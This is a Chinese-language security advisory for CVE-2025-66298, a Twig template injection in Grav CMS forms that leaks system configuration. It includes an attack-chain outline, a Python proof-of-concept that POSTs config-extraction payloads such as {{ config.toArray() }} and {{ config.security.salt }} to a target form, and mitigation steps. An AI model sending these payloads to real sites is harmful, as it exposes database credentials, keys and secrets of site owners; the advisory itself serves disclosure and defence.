CVE-2025-66298 Grav CMS 服务器端模板注入导致配置信息泄露

漏洞信息

漏洞编号

CVE-2025-66298

漏洞类型

服务器端模板注入(SSTI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Grav CMS

漏洞概述

CVE-2025-66298是Grav CMS中的一个服务器端模板注入(SSTI)漏洞。该漏洞影响Grav 1.8.0-beta.27之前的所有版本。攻击者可以通过构造恶意的POST请求载荷，利用网站上的简单表单功能，触发服务器端模板注入漏洞，从而获取整个Grav系统的配置详细信息。这些配置信息可能包含数据库凭据、API密钥、插件配置、加密密钥等敏感信息。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此具有较高的安全风险。CVSS评分7.5分，主要影响系统的机密性，可能导致敏感配置信息的大规模泄露。

技术细节

该漏洞存在于Grav CMS的表单处理模块中。攻击者利用服务器端模板注入技术，通过POST请求发送特制的载荷到存在表单功能的页面。Grav使用Twig作为模板引擎，当用户输入被不正确地传递到模板渲染函数时，攻击者可以注入Twig模板语法，从而执行任意模板操作。通过精心构造的载荷，攻击者可以访问Grav的配置对象，获取所有配置变量值，包括：1) 核心配置文件(系统配置、站点配置)；2) 插件配置(第三方插件的设置和凭据)；3) 用户配置(用户账户信息、权限设置)；4) 环境变量和密钥。由于配置信息通常包含数据库连接字符串、加密密钥、第三方服务凭据等高敏感度数据，泄露后可能导致进一步的系统入侵和数据泄露。修复版本1.8.0-beta.27通过增加输入验证和模板渲染安全检查来解决此问题。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Grav CMS版本，确认版本低于1.8.0-beta.27

STEP 2

步骤2: 发现攻击面

扫描网站寻找存在表单功能的页面，这些页面可能存在SSTI漏洞

STEP 3

步骤3: 构造恶意载荷

构造Twig模板注入载荷，如{{ config.toArray() }}或{{ dump(config) }}

STEP 4

步骤4: 发送POST请求

通过POST请求将恶意载荷发送到目标表单端点，无需任何认证

STEP 5

步骤5: 提取敏感配置

服务器端模板引擎执行注入的代码，返回完整的系统配置信息

STEP 6

步骤6: 横向移动

利用获取的数据库凭据、API密钥等敏感信息进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-66298 PoC - Grav CMS SSTI Configuration Disclosure
# Target: Grav CMS < 1.8.0-beta.27

target_url = "http://target-site.com/"  # Replace with actual target

# SSTI payload to extract configuration details
# This payload exploits Twig template injection to access config objects
ssti_payloads = [
    # Basic config extraction
    "{{ config.toArray() }}",
    # System configuration
    "{{ config.system.toArray() }}",
    # Plugins configuration
    "{{ config.plugins.toArray() }}",
    # All configuration
    "{{ dump(config) }}",
    # Specific sensitive data
    "{{ config.system.database }}",
    "{{ config.security.salt }}",
]

def exploit_grav_ssti():
    """Exploit Grav CMS SSTI to disclose configuration"""
    
    # Target endpoint - typically a form page
    form_url = target_url + "form-page"  # Identify the vulnerable form
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    results = []
    
    for payload in ssti_payloads:
        # Prepare POST data with SSTI payload
        post_data = {
            "form": {
                "fields": {
                    "name": payload
                }
            }
        }
        
        try:
            response = requests.post(form_url, data=post_data, headers=headers, timeout=10)
            
            # Check for configuration disclosure in response
            if "database" in response.text or "password" in response.text or "salt" in response.text:
                results.append({
                    "payload": payload,
                    "status": "VULNERABLE",
                    "config_leaked": True,
                    "response_length": len(response.text)
                })
        except requests.exceptions.RequestException as e:
            results.append({
                "payload": payload,
                "status": f"ERROR: {str(e)}",
                "config_leaked": False
            })
    
    return results

if __name__ == "__main__":
    print("CVE-2025-66298 - Grav CMS SSTI Exploitation")
    print("Target:", target_url)
    print("-" * 50)
    
    results = exploit_grav_ssti()
    for result in results:
        print(json.dumps(result, indent=2))

影响范围

Grav CMS < 1.8.0-beta.27

防御指南

临时缓解措施

立即将Grav CMS升级到1.8.0-beta.27或最新稳定版本。如果无法立即升级，可以临时采取以下措施：1) 禁用不必要的表单功能；2) 在Web应用防火墙(WAF)层面添加规则阻止可疑的模板语法字符(如{{、}}、[、]等)；3) 限制表单端点的访问频率；4) 监控服务器日志中的异常请求模式；5) 确保配置文件权限正确设置，防止通过其他途径读取敏感配置。